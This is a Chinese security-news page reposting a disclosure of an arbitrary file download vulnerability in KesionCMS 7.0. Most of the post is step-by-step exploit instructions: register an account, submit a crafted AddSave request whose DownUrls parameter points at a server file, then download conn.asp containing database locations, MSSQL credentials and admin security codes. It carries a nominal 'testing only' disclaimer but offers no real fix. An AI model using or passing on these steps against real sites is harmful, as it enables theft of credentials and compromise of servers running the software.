• 选择风格
  • 加入收藏
  • 繁體中文
  • 网站地图
    • 当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

    kesioncms7.0最新版本任意下载漏洞

    时间:2013/4/19 12:10:00 作者:平凡之路 来源:xuhantao.com 浏览:

    版本:90sec
    说明:请用于漏洞安全测试,请勿非法利用
    修复方案:我想官方会懂的
     
    漏洞检测方法:
    先注册个用户登陆,然后访问  可以看到几个可以投稿的分类,选择个软件投稿.点下一步!
     
     
     
    然后会跳到: /user/User_MySoftWare.asp?action=Add&channelid=3&ClassID=20102479005271(这个ClassID不同的站可能会不一样)
     
    然后在把地址输入: /user/User_MySoftWare.asp?action=AddSave&channelid=3&ClassID=20102479005271(上面的ClassID)&Title=aa&DownUrls=/admin63.net.asp(要下载的文件路径。)
     
    输入好后就会发布一个标题为aa的软件投稿可以在 /user/User_ItemInfo.asp?ChannelID=3 看到 发布的投稿。
     
    打开发布的aa投稿,www.xuhantao.com,然后会出现下载截面直接点下载就可以下载到conn.asp这个文件了,一般数据库地址,或者mssql 数据帐户 后台安全码等等 都会记录在里面!
     
     
    由于时间晚了,我就随便说下咯,涛涛电脑知识网,大概利用就是刚才我说的那样,漏洞放手里半年了,有兴趣的可以去研究下

  • 上一篇:快乐购物网短信无验证致轰炸漏洞
  • 下一篇:小米某分站对参数过滤不严,可以导致XSS
    • 相关文章
    • 没有相关文章
    共有评论 0相关评论
    发表我的评论
    • 大名:
    • 内容:
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1